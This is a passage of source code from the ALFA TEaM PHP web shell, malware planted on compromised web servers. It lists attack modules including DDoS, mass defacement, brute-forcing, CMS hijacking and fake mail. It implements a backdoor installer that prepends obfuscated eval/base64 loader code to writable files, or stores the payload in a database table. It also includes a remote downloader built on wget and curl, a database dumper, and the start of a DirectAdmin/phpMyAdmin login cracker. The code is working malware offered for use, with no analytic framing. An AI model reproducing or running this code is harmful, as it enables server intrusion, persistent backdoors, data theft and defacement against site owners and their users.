1783$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
1784if(!@ini_get('safe_mode')){
1785if(strlen(alfaEx("id",false,false))>0){
1786echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
1787$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
1788$x=0;
1789foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
1790if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1791echo '</td>
1792</tr>
1793<tr>
1794<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
1795$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1796$x=0;
1797foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
1798if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1799echo '</td>
1800</tr>';
1801}else{
1802echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1803}
1804}else{
1805echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1806}
1807}else{
1808echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
1809echo alfaEx('ver',false,false);
1810echo '</td>
1811</tr> <tr>
1812<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
1813</tr></b>';
1814}
1815$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
1816echo '<tr>
1817<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
1818</tr>
1819<tr>
1820<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
1821</tr>
1822<tr>
1823<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
1824</tr>
1825<tr>
1826<td height="11"><span class="header_vars">SoftWare: </span></td>
1827<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
1828</tr>';
1829if($GLOBALS['sys']=="win"){
1830echo '<tr>
1831<td height="12"><span class="header_vars">DRIVE:</span></td>
1832<td colspan="2"><b>'.$drives.'</b></td>
1833</tr>';
1834}
1835echo '<tr>
1836<td height="12"><span class="header_vars">PWD:</span></td>
1837<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
1838</tr>
1839</table>
1840</div>
1841<div id="meunlist">
1842<ul>
1843';
1844$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
1845'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
1846'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
1847'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
1848'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
1849);
1850foreach($li as $key=>$value){
1851echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
1852}
1853if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
1854echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
1855else
1856echo '</ul></div>';}else{
1857@error_reporting(E_ALL ^ E_NOTICE);
1858@ini_set('error_log',NULL);
1859@ini_set('log_errors',0);
1860@ini_set('max_execution_time',0);
1861@ini_set('magic_quotes_runtime', 0);
1862@set_time_limit(0);
1863}}
1864function alfalogout(){
1865unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
1866echo("<center><font color='red'>Logout...</font></center>");
1867}
1868function showAnimation($name){
1869 return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
1870}
1871function __showicon($r){
1872 $s['btn']='http://solevisible.com/images/btn.png';
1873 $s['alfamini']='http://solevisible.com/images/alfamini.png';
1874 $s['loader']='http://solevisible.com/images/loader.png';
1875 //return 'data:image/png;base64,'.__get_resource($s[$r]);
1876 return $s[$r];
1877}
1878function alfainbackdoor(){
1879alfahead();
1880echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
1881$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
1882$success= '<font color="green">Success...!';
1883$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
1884$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
1885$cwd = 'Example: /home/alfa/public_html/index.php';
1886if($_POST['alfa1']=='file'){
1887echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
1888if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
1889$method = $_POST['alfa2'];
1890$file = $_POST['alfa3'];
1891$shell = $_POST['alfa4'];
1892$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
1893if($key=='')$key='alfa';
1894if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1895$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
1896if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
1897if($_POST['alfa1']=='db'){
1898echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
1899$table = array('td1' =>
1900array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1901'td2' =>
1902array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1903'td3' =>
1904array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1905'td4' =>
1906array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1907'td5' =>
1908array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
1909'td6' =>
1910array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
1911);
1912create_table($table);
1913echo("<p>{$select}</p>");
1914echo($textarea);
1915echo("<p><input type='submit' value=' '></p></form></p></center>");
1916if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
1917$dbhost = $_POST['alfa2'];
1918$dbuser = $_POST['alfa3'];
1919$dbpw = $_POST['alfa4'];
1920$dbname = $_POST['alfa5'];
1921$file = $_POST['alfa6'];
1922$method = $_POST['alfa7'];
1923$shell = $_POST['alfa8'];
1924$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
1925if($key=='')$key='alfa';
1926if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1927if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
1928$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
1929if(@is_file($file)&&@is_writable($file)){
1930@mysqli_query($conn,'DROP TABLE `alfa_bc`');
1931@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
1932@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
1933@file_put_contents($file,$code."\n".@file_get_contents($file));
1934__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
1935echo('</div>');
1936alfafooter();
1937}
1938function alfawhois(){
1939echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
1940if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
1941$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
1942$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
1943$data = @file_get_contents($target);
1944if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
1945$target = @json_decode($data,true);
1946echo __pre();
1947if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
1948echo("</div>");
1949}
1950function alfaremotedl(){
1951alfahead();
1952echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
1953<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
1954<p><div class='txtfont'>Url: </div> <input type='text' name='d' size='50'></p>
1955<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
1956</form></p></center>");
1957if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
1958echo __pre();
1959$url = $_POST['alfa1'];
1960$path = $_POST['alfa2'];
1961echo('<center>');
1962if(__download($url,$path)){
1963echo('<font color="green">Success...!</font>');
1964}else{
1965echo('<font color="red">Error...!</font>');
1966}
1967echo('</center>');
1968}
1969echo("</div>");
1970alfafooter();
1971}
1972function __download($url,$path=false){
1973if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
1974$saveas = basename(rawurldecode($url));
1975if($path){$saveas=$path.$saveas;}
1976if($content = __read_file($url)){
1977if(@is_file($saveas))@unlink($saveas);
1978if(__write_file($saveas, $content)){return true;}}
1979$buff = alfaEx("wget ".$url." -O ".$saveas);
1980if(@is_file($saveas)) return true;
1981$buff = alfaEx("curl ".$url." -o ".$saveas);
1982if(@is_file($saveas)) return true;
1983$buff = alfaEx("lwp-download ".$url." ".$saveas);
1984if(@is_file($saveas)) return true;
1985$buff = alfaEx("lynx -source ".$url." > ".$saveas);
1986if(@is_file($saveas)) return true;
1987$buff = alfaEx("GET ".$url." > ".$saveas);
1988if(@is_file($saveas)) return true;
1989$buff = alfaEx("links -source ".$url." > ".$saveas);
1990if(@is_file($saveas)) return true;
1991$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
1992if(@is_file($saveas)) return true;
1993return false;
1994}
1995function clean_string($string){
1996 if(function_exists("iconv")){
1997 $s = trim($string);
1998 $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
1999 }
2000 return $s;
2001}
2002function __read_file($file, $boom = true){
2003$content = false;
2004if($fh = @fopen($file, "rb")){
2005$content = "";
2006while(!feof($fh)){
2007$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
2008}
2009}
2010if(empty($content)||!$content){
2011 $content = alfaEx("cat '".addslashes($file)."'");
2012}
2013return $content;
2014}
2015function alfaSettings(){
2016alfahead();
2017AlfaNum(6,7,8,9,10);
2018echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
2019if($_POST["alfa8"] == "main"){
2020echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
2021$lg_array = array('0'=>'No','1'=>'Yes');
2022$penc_array = array('false'=>'No','true'=>'Yes');
2023$protect_html = "";
2024$icon_html = "";
2025$postEnc_html = "";
2026$login_html = "";
2027foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
2028foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
2029foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
2030$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
2031foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
2032echo '';
2033echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
2034if($_POST['alfa5']=='>>'){
2035echo __pre();
2036if(!empty($_POST['alfa3'])){
2037$protect = $_POST['alfa1'];
2038$lgpage = $_POST['alfa2'];
2039$username = $_POST['alfa3'];
2040$password = md5($_POST['alfa4']);
2041$icon = $_POST['alfa6'];
2042$post_encrypt = $_POST['alfa7'];
2043@chdir($GLOBALS['home_cwd']);
2044$basename = @basename($_SERVER['PHP_SELF']);
2045$data = @file_get_contents($basename);
2046$find_user = '/\'user\'(.*?),/i';
2047$find_pw = '/\'pass\'(.*?),/i';
2048$find_lg = '/\'login_page\'(.*?),/i';
2049$find_p = '/\'safemode\'(.*?),/i';
2050$icons = '/\'show_icons\'(.*?),/i';
2051$postEnc = '/\'post_encryption\'(.*?),/i';
2052if(!empty($username)&&preg_match($find_user,$data,$e)){
2053$new = '\'user\' => \''.$username.'\',';
2054$data = str_replace($e[0],$new,$data);
2055}
2056if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
2057$new = '\'pass\' => \''.$password.'\',';
2058$data = str_replace($e[0],$new,$data);
2059}
2060if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
2061$new = '\'login_page\' => \''.$lgpage.'\',';
2062$data = str_replace($e[0],$new,$data);
2063}
2064if(!empty($find_p)&&preg_match($find_p,$data,$e)){
2065$new = '\'safemode\' => \''.$protect.'\',';
2066$data = str_replace($e[0],$new,$data);
2067}
2068if(preg_match($icons,$data,$e)){
2069$new = '\'show_icons\' => \''.$icon.'\',';
2070$data = str_replace($e[0],$new,$data);
2071}
2072if(preg_match($postEnc,$data,$e)){
2073$new = '\'post_encryption\' => '.$post_encrypt.',';
2074$data = str_replace($e[0],$new,$data);
2075}
2076if(@file_put_contents($basename,$data)){
2077echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
2078}else{
2079__alert("<span style='color:red;'>File has no edit access...!</span>");
2080}
2081}else{
2082__alert("<span style='color:red;'>UserName is Empty !</span>");
2083}
2084}
2085}elseif($_POST["alfa8"] == "color"){
2086echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
2087echo '<table border="1"><tbody>';
2088$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
2089$x = 1;
2090foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
2091 $multi = "";
2092 if(is_array($value)){
2093 if(isset($value["multi_selector"])){
2094 $multi = __ZW5jb2Rlcg(json_encode($value));
2095 }
2096 }
2097 $value = alfa_getColor($key);
2098 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
2099 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
2100}
2101echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
2102
2103echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
2104if($_POST['alfa7']=='export'){
2105 echo __pre();
2106 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
2107 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2108 $array = array();
2109 foreach($glob_colors as $k => $v){
2110 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2111 $v = trim($colors[$k]);
2112 }else{
2113 $v = trim(is_array($v)?$v["key_color"]:$v);
2114 }
2115 $array[$k] = $v;
2116 }
2117 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
2118 $config = json_encode($array, JSON_PRETTY_PRINT);
2119 if(!@file_put_contents($file, $config)){
2120 echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
2121 }else{
2122 echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
2123 }
2124}
2125if($_POST['alfa2']=='>>'){
2126 echo __pre();
2127 $colors = json_decode($_POST["alfa1"],true);
2128 $array = "";
2129 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
2130 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2131 foreach($glob_colors as $k => $v){
2132 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2133 $v = trim($colors[$k]);
2134 }else{
2135 $v = trim(is_array($v)?$v["key_color"]:$v);
2136 }
2137 $array .= '"'.trim($k).'" => "'.$v.'",';
2138 }
2139 @chdir($GLOBALS['home_cwd']);
2140 $basename = @basename($_SERVER['PHP_SELF']);
2141 $data = @file_get_contents($basename);
2142 $color = '/\'color\'(.*?)\),/s';
2143 if(preg_match($color,$data,$e)){
2144 $new = "'color' => array(".$array."),";
2145 $data = str_replace($e[0],$new,$data);
2146 if(@file_put_contents($basename, $data)){
2147 echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
2148 }else{
2149 echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
2150 }
2151 }else{
2152 echo("<center><p><h3>[-] Error...!</h3></p></center>");
2153 }
2154}
2155}
2156echo('</div>');
2157alfafooter();
2158}
2159function alfaplus(){
2160alfahead();
2161echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
2162if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
2163try{
2164$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
2165$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
2166$news = new AlfaCURL();
2167if($news->Send($s1)){
2168$xml = $news->Send($s1);
2169}else{
2170$xml = false;
2171}
2172if($xml){
2173if(@simplexml_load_string($xml)){
2174$doc = new DOMDocument;
2175$doc->loadXML($xml);
2176$data = $doc->getElementsByTagName('data')->item(0);
2177$items = $data->getElementsByTagName('item');
2178foreach($items as $item){
2179$title = $item->getElementsByTagName('title')->item(0)->nodeValue;
2180$description = $item->getElementsByTagName('description')->item(0)->nodeValue;
2181$link = $item->getElementsByTagName('link')->item(0)->nodeValue;
2182$pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
2183echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
2184}
2185}else{
2186echo($msg);
2187}
2188}else{
2189echo($msg);
2190}
2191}catch(Exception $e){
2192echo $e->getMessage();
2193}}elseif($_POST['alfa1']=='about'){
2194echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
2195<b><font size='+3' color='#00A220'>☮ ~ PEACE ~ ☮</font><br><b>
2196<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
2197<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
2198<font color='#00A220'>Telegram Channel: @solevisible</font><br>
2199<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
2200<font color='#FFFFFF'>Skype : sole.sad</font><br>
2201<font color='#FF0000'>Persian Gulf For Ever</font><br>
2202<font color='#FF0000'>Iranian Hackers :)</font><br>
2203<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
2204</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
2205}
2206echo('</div>');
2207alfafooter();
2208}
2209function alfaDumper(){
2210alfahead();
2211echo('<div class="header">');
2212AlfaNum(8,9,10);
2213echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
2214$table = array('td1' =>
2215 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2216 'td2' =>
2217 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2218 'td3' =>
2219 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2220 'td4' =>
2221 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2222 'td5' =>
2223 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
2224);
2225create_table($table);
2226echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
2227$username = ($_POST['alfa3']);
2228$password = ($_POST['alfa4']);
2229$dbname = ($_POST['alfa5']);
2230$dfile = ($_POST['alfa6']);
2231$host = ($_POST['alfa7']);
2232if(!empty($dbname)){
2233echo __pre();
2234$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
2235if(@mysqli_connect($host,$username,$password,$dbname)){
2236if(strlen(alfaEx("mysqldump"))>0){
2237alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
2238echo($msg);
2239}else{
2240__alert("Error...!");
2241}
2242}else{
2243echo('<center>mysqli_connect : Error!</center>');
2244}
2245}
2246echo('</div>');
2247alfafooter();
2248}
2249function Alfa_DirectAdmin_Cracker($info){
2250if(!$info['mysql'])
2251$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
2252else $url = $info['protocol'].$info['target'].'/phpmyadmin';
2253$curl = curl_init();
2254curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2255curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2256curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2257curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2258curl_setopt($curl, CURLOPT_HEADER,0);
2259curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2260curl_setopt($curl, CURLOPT_URL,$url);
2261curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
2262if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
2263$result = curl_exec($curl);
2264$curl_errno = curl_errno($curl);
2265$curl_error = curl_error($curl);
2266if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
